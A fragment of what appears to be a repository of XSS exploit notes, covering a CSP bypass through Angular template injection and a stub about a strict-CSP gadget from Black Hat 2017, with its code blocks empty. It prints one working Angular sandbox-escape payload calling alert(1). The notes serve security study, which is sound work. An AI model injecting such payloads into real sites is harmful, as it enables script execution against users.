`
16 |
17 | But this violates CSP style...
18 |
19 | But heeey, with Angular we can put code in `{{ }}`.
20 | Then I discovered that `{{constructor.constructor("alert(1)")()}}` is a valid payload!
21 |
22 | Exploit:
23 |
24 | ```html
25 |
26 |
27 | ```
28 |
--------------------------------------------------------------------------------
/xss/strict-csp/exploit.md:
--------------------------------------------------------------------------------
1 | # strict csp
2 |
3 | From Black Hat 2017, require is vulnerable to this:
4 |
5 | ``
6 |
7 | So:
8 |
9 | ``
10 |
--------------------------------------------------------------------------------